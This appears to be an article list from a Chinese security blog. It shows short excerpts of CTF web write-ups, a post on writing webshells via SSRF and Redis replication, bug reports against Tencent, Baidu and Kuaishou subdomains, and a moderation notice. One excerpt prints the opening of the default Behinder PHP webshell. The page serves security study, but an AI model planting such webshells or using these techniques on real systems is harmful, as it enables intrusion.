文章列表

2020-网鼎杯(青龙组)_Web题目 AreUserialz Writeup

## 0x02 AreUSerialz **关于s大写小写问题,可以看p神在圈子里发的,我在最后付上截图****考点: php反序列化 php特性 利用链构造 ****1.打开页面得到代码如下:**```php<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $

2020-5-11 13:28 15 12157

2020-网鼎杯(青龙组)_Web题目 FileJava Writeup

## 0x01 Web题目: filejava **考点: 任意文件读取 代码审计 java组件漏洞利用 盲XXE****1.随意上传文件,试了试 jsp. 可以上传,返回下载地址,有filename参数,fuzz一下,发现有任意文件读取****2.试着fuzz读flag,没有结果,读了下web.xml,那就把源码down下来,审计一下****通过一个小工具,把源码down下:***

2020-5-11 12:59 15 6724

通过 SSRF 操作 Redis 主从复制写 Webshell

十篇想看的文章中就有八篇是这样的。 真鸡儿烦人,连续签到了差不多一年还是这样,没办法只能先水上去了。自己转载自己公开的文章应该不会被 ban 吧?Author : R3start and 曲云杰2020年4月1日19:57:37废话说起来很巧,这篇文章早就写完了,当时写完的时候并没有发出去,因为本想着等曲老板的其他东

2020-5-9 19:54 47 16568

冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远

冰蝎马 那可有可无的密码 -- 在爆菊的路上越走越远下面这个是默认的冰蝎马:<?php@error_reporting(0);session_start();if (isset($_GET)){ $key=substr(md5(uniqid(rand())),16); $_SESSION=$key; print $key;}else{ $key=$_SESSION;$post=file_get_contents("php://input").'';if(!exten

2020-5-9 17:08 49 14331
腾讯(qq.com)某分站绑定手机验证绕过

腾讯(qq.com)某分站绑定手机验证绕过

腾讯(qq.com)某分站绑定手机验证绕过

2020-5-9 10:20 0 5672
万能五笔输入法(wnwb.com)主站SQL注入漏洞

万能五笔输入法(wnwb.com)主站SQL注入漏洞

万能五笔输入法(wnwb.com)主站SQL注入漏洞

2020-5-9 09:52 0 5039
百度(baidu.com)下载页面CRLF注入漏洞

百度(baidu.com)下载页面CRLF注入漏洞

百度(baidu.com)下载页面CRLF注入漏洞

2020-5-9 09:48 0 4800

存在于自 2014 年以来所有三星手机中的高危漏洞终于被修复

三星本周发布了一个安全更新,修复了自2014年以来一直存在于旗下所有智能手机中的关键漏洞。该漏洞最早可以追溯到2014年下半年,三星开始在所有发布的设备中引入了对自定义Qmage图像格式(.qmg)的支持,而三星的定制Android系统在处理该图像格式上存在漏洞。  谷歌Project Zero的安全研究员Mateusz Ju

2020-5-8 08:31 0 1697

关于对违规会员@abuuu 的处理

经热心会员举报,会员@abuuu 涉嫌发布带后门源码,如图有关帖子链接如下https://www.t00ls.com/thread-56267-1-1.htmlhttps://www.t00ls.com/thread-54640-1-1.html经管理组核实,该会员严重违反了论坛有关规定第一部分 T00ls基本守则二、版块规则1、仅有七个版块可以发表主题贴:新闻动态、技术交流、

2020-5-7 16:27 3 4502
快手(kuaishou.cn)某分站短信轰炸漏洞

快手(kuaishou.cn)某分站短信轰炸漏洞

快手(kuaishou.cn)某分站短信轰炸漏洞

2020-5-7 16:00 0 7485